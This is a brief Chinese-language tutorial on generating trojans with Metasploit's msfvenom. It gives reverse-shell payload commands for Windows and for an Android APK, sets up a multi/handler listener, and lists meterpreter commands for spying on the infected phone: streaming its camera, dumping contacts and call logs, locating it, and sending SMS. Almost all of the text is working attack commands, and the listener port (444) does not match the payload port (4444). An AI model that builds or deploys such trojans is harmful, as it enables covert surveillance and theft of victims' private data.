msf自带的有对应各个平台生成木马的工具msfvenom,而且不需要进入msf,直接在命令行输入命令即可
木马生成命令
msfvenom -p payload LHOST=本地地址 LPORT=本地端口 -f 文件类型 -o 木马文件
如:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.60.44 LPORT=4444 -f exe -o payload.exe
本次以一个安卓手机木马为例,简单介绍msf的木马生成功能
环境准备
肉鸡 : 一加3T手机 安卓8.0 已获取root
攻击机 : kali
木马生成
msfvenom --platform android -p android/meterpreter_reverse_tcp LHOST=192.168.1.16 LPORT=4444 R> /root/demo.apk
设置监听
use exploit/multi/handler
set lhost 192.168.1.16
set lport 444
上传木马到手机 并打开
使用监听
run
查看命令
help
打开手机前置摄像头
webcam_stream -i 2
前提是手机亮屏 , 第一次手机会有摄像头打开的提示 , 默认锁屏一会消失画面
获取手机联系人
dump_contacts #获取联系人列表
针对手机的其他命令:
Geolocate #定位
wlan_geolocate #wifi 定位
dump_calllog #获取通话记录
send_sms #发送短信
# 发送短信:
meterpreter > send_sms -d 152xxxx1475 -t hello word
[+] SMS sent - Transmission successful